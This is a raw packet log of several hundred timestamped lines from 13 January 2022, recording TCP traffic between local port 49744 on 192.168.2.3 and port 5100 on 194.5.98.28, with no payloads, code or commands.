Jan 13, 2022 15:32:31.169734955 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.169766903 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.169786930 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.169826031 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.169836044 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.169872999 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.169889927 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.169930935 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.169935942 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.169965982 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.169970989 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.170011044 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.170016050 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.170047998 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.170052052 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.170092106 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.170103073 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.170131922 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.170208931 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.170254946 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.170501947 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.170538902 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.170552015 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.170799971 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.170840025 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.170852900 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.170881033 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.170882940 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.170923948 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.170924902 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.170959949 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.170964003 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.171001911 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.171008110 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.171039104 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.171040058 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.171081066 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.171082973 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.171123028 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.171127081 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.171159983 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.171170950 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.171200037 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.266082048 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.266153097 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.378477097 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.378540993 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.378591061 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.378617048 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.384764910 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.384809017 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.384848118 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.384850025 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.384885073 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.384907961 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.384929895 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.384989023 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.385153055 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.385209084 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.385303020 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.385360003 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.391357899 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.391418934 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.391459942 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.391491890 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.391495943 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.391540051 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.391766071 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.391808987 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.391820908 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.392499924 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.392581940 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.392781973 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.392836094 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.392977953 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.393018961 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.393027067 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.393055916 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.393062115 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.393095016 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.393131971 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.393170118 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.393177032 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.393213987 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.393410921 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.393479109 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.395478010 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.395545959 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.395622015 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.395695925 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.395720005 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.395766973 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.395881891 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.395925999 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.395941973 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.395967960 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.395982981 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.396012068 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.396030903 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.396054029 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.396266937 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.396318913 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.396457911 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.396502018 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.396595001 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.396661043 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.396770000 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.396828890 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.396842003 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.396888971 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.396895885 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.396930933 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.396938086 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.396969080 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.396985054 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.397010088 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.397026062 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.397052050 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.397064924 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.397087097 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.397089958 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.397129059 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.397133112 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.397161961 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.397192001 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.397198915 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.397211075 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.397245884 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.397291899 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.397337914 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.397361994 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.397407055 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.397475004 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.397520065 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.397887945 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.397938013 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.397950888 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.397998095 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.398288012 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.398355007 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.400893927 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.400938034 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.401024103 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.401047945 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.401211023 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.531485081 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.596262932 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.596319914 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.596355915 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.596409082 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.601552963 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.601653099 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.601669073 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.601711988 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.601741076 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.601752043 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.601764917 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.601790905 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.601808071 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.601830959 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.601856947 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.601876020 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.608792067 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.608870029 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.612746000 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.612818956 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.622196913 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.623718023 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.623791933 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.623908997 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.623961926 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.624535084 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.624602079 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.624711037 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.624771118 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.624810934 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.624866962 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.625269890 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.625324965 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.625351906 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.625377893 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.625519991 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.625577927 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.625674963 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.625731945 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.625881910 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.625942945 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.626374006 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.626446962 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.626552105 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.626604080 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.626610994 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.626666069 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.626679897 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.626722097 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.626739979 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.626779079 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.627135992 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.627197981 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.627371073 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.627412081 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.627434969 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.627449036 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.627477884 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.627487898 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.627516985 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.627561092 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.627690077 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.627748966 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.627758026 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.627825022 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.627944946 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.627985001 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.628022909 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.628047943 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.628124952 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.628192902 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.628233910 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.628283978 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.628304958 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.628365993 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.628436089 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.628519058 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.628633022 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.628680944 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.628873110 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.628928900 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.629080057 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.629149914 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.629228115 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.629282951 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.629482985 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.629539967 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.629654884 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.629693985 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.629715919 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.629746914 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.629983902 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.630045891 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.630145073 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.630201101 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.630203009 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.630280972 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.630323887 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.630383015 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.630450010 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.630491972 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.630511045 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.630552053 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.630613089 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.630671024 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.630778074 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.630851984 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.630883932 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.630930901 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.630956888 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.630975962 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.631061077 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.631103039 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.631114960 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.631155968 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.631277084 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.631335974 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.634566069 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.634596109 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.634629011 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.634668112 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.634727001 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.634788990 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.634902000 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.634963036 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.635101080 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.635154009 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.635226011 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.635298967 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.635413885 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.635466099 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.635582924 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.635642052 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.635803938 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.635833979 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.635865927 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.635885954 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.636168957 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.636198044 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.636233091 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.636256933 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.636311054 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.636358023 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.636538029 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.636595011 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.637092113 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.637121916 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.637142897 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.637151957 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.637186050 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.637191057 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.637218952 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.637231112 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.637382984 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.637424946 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.637442112 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.637465954 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.637921095 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.638000011 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.638079882 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.638108969 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.638129950 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.638153076 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.638293028 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.638320923 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.638346910 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.638379097 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.638428926 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.638478994 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.638626099 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.638680935 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.638704062 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.638751984 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.813484907 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.813560963 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.813613892 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.813637972 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.819030046 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.819103956 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.819144964 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.819152117 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.819164991 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.819202900 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.819205999 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.819259882 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.819643021 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.819704056 CET	5100	49744	194.5.98.28	192.168.2.3
